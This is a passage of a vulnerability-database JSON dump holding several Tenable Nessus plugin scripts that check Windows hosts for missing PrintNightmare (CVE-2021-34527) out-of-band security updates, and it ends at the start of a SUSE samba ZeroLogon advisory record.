value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004958'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004958])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:55", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004946.NASL", "href": "https://www.tenable.com/plugins/nessus/151472", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151472);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004946\");\n script_xref(name:\"MSFT\", value:\"MS21-5004946\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004946: Windows 10 1909 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004946\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004946\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004946'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'18363',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004946])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004959.NASL", "href": "https://www.tenable.com/plugins/nessus/151478", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151478);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004959\");\n script_xref(name:\"MSFT\", value:\"MS21-5004959\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004959: Windows Server 2008 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004955\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004959\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004959\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004959'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004959])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:00", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004945.NASL", "href": "https://www.tenable.com/plugins/nessus/151471", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151471);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004945\");\n script_xref(name:\"MSFT\", value:\"MS21-5004945\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004945: Windows 10 2004 / 20H2 / 21H1 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \n operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004945\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004945\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004945'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'19041',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945])\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19042',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n|| \nsmb_check_rollup(os:'10', \n sp:0,\n os_build:'19043',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004945]\n)\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:57:16", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004950.NASL", "href": "https://www.tenable.com/plugins/nessus/151475", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151475);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004950\");\n script_xref(name:\"MSFT\", value:\"MS21-5004950\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004950: Windows 10 1507 LTS OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004950\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004950'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'10240',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004950])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:01", "description": "A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file operations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "nessus", "title": "KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34527"], "modified": "2023-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JUL_5004947.NASL", "href": "https://www.tenable.com/plugins/nessus/151473", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151473);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/07\");\n\n script_cve_id(\"CVE-2021-34527\");\n script_xref(name:\"IAVA\", value:\"2021-A-0299\");\n script_xref(name:\"MSKB\", value:\"5004947\");\n script_xref(name:\"MSFT\", value:\"MS21-5004947\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5004947: Windows 10 1809 and Windows Server 2019 OOB Security Update RCE (July 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"A remote command execution vulnerability exists in Windows Print Spooler service improperly performs privileged file \noperations. An authenticated, remote attacker can exploit this to bypass and run arbitrary code with SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5004947\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5004947\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-07';\nkbs = make_list(\n '5004947'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:'17763',\n rollup_date:'06_2021_07_01',\n bulletin:bulletin,\n rollup_kb_list:[5004947])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", 